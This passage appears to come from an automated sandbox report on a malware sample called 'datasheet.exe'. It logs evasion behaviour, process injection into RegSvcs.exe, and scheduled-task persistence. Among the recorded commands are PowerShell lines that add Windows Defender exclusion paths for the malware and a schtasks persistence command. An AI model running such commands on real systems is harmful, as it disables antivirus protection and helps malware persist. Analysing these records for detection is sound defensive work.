                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match; File source: Process Memory Space: datasheet.exe PID: 2960, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: EhzaIxEFbjyd.exe PID: 6672, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\datasheet.exe; Memory allocated: 1170000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\datasheet.exe; Memory allocated: 2D00000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\datasheet.exe; Memory allocated: 7DF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\datasheet.exe; Memory allocated: 8DF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\datasheet.exe; Memory allocated: 8FB0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\datasheet.exe; Memory allocated: 9FB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Memory allocated: 2BB0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Memory allocated: 2D60000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Memory allocated: 2BE0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Memory allocated: 7AD0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Memory allocated: 8AD0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Memory allocated: 8C80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Memory allocated: 9C80000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\datasheet.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6202
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 453
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6079
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 521
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Window / User API: threadDelayed 1581
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Window / User API: threadDelayed 809
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Window / User API: threadDelayed 1511
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Window / User API: threadDelayed 8330
                    Source: C:\Users\user\Desktop\datasheet.exe TID: 3320; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 988; Thread sleep count: 6202 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3560; Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 988; Thread sleep count: 453 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1336; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7112; Thread sleep time: -3689348814741908s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2896; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe TID: 7236; Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Last function: Thread delayed
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99543
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99411
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99162
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98422
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99761
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 99094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98756
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98375
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98266
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98155
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 98047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97938
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97813
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97344
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 97000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96563
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96218
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 96110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 95693
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 95568
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 95438
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 95313
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 95172
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 95063
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 94953
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 94844
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 94735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 94610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 94485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 94360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 94235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 94110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe; Thread delayed: delay time: 93985
                    Source: RegSvcs.exe, 00000009.00000002.2225101640.00000000064F2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\datasheet.exe; Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\datasheet.exe; Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\datasheet.exe; Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\datasheet.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\datasheet.exe"
                    Source: C:\Users\user\Desktop\datasheet.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe"
                    Source: C:\Users\user\Desktop\datasheet.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\datasheet.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\datasheet.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                    Source: C:\Users\user\Desktop\datasheet.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                    Source: C:\Users\user\Desktop\datasheet.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000
                    Source: C:\Users\user\Desktop\datasheet.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000
                    Source: C:\Users\user\Desktop\datasheet.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F1E008
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: BE7008
                    Source: C:\Users\user\Desktop\datasheet.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmp8D3A.tmp"
                    Source: C:\Users\user\Desktop\datasheet.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EhzaIxEFbjyd" /XML "C:\Users\user\AppData\Local\Temp\tmpA381.tmp"
                    Source: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\datasheet.exe; Queries volume information: C:\Users\user\Desktop\datasheet.exe VolumeInformation
                    Source: C:\Users\user\Desktop\datasheet.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\datasheet.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\datasheet.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
